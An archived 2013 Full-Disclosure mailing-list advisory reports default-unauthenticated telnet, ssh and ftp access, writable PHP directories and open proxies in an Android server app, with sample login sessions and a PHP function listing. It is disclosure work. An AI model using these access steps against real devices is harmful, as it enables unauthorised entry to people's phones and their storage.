[<prev] [next>] [day] [month] [year] [list]
Message-id: <8716F531-64E0-43B6-8A5A-C2750CB743C2@me.com>
Date: Fri, 04 Oct 2013 11:05:36 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in Ice Cold Apps Servers
Ulitmate Version 6.0.2(12) for Android
Multiple vulnerabilities in Ice Cold Apps Servers Ulitmate Version 6.0.2(12) for Android
9/8/13
Larry W. Cashdollar, @_larry0
http://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647
http://www.icecoldapps.com
Vulnerabilities
There are no credentials by default, authentication is disabled for telnet/ssh/ftp allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.
• ftp server allows writes to lighttp/php* directory.
• telnet default authentication turned off.
• ssh server default authentication turned off.
• Anonymous SOCKS proxy & http/ftp proxy.
SSHD
larry$ ssh 192.168.0.29 -p 2222
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $ uptime
up time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00 $
Telnet
larry$ telnet 192.168.0.29 2323
Trying 192.168.0.29...
Connected to 192.168.0.29.
Escape character is '^]'.
Welcome to tel!
Please enter some text to test the connection and hit enter:
$
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $
lighttpd / PHP server
• php has the following functions available:
Via
<?php
$arr = get_defined_functions();
echo "<pre>";
print_r($arr);
echo "</pre>";
?>
Returned 1300 functions, including exec, pass_thru system() and
[662] => socket_select
[663] => socket_create
[664] => socket_create_listen
[665] => socket_create_pair
[666] => socket_accept
[667] => socket_set_nonblock
[668] => socket_set_block
[669] => socket_listen
[670] => socket_close
[671] => socket_write
[672] => socket_read
[673] => socket_getsockname
[674] => socket_getpeername
[675] => socket_connect
[676] => socket_strerror
[677] => socket_bind
[678] => socket_recv
[679] => socket_send
[680] => socket_recvfrom
[681] => socket_sendto
[682] => socket_get_option
[683] => socket_set_option
[684] => socket_shutdown
[685] => socket_last_error
[686] => socket_clear_error
[687] => socket_import_stream
[688] => socket_getopt
[689] => socket_setopt
Vendor Notified: 9/10/2013
The full list is here:
http://vapid.dhs.org/advisories/ultimate-server-android-vulns.html
-- Larry
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists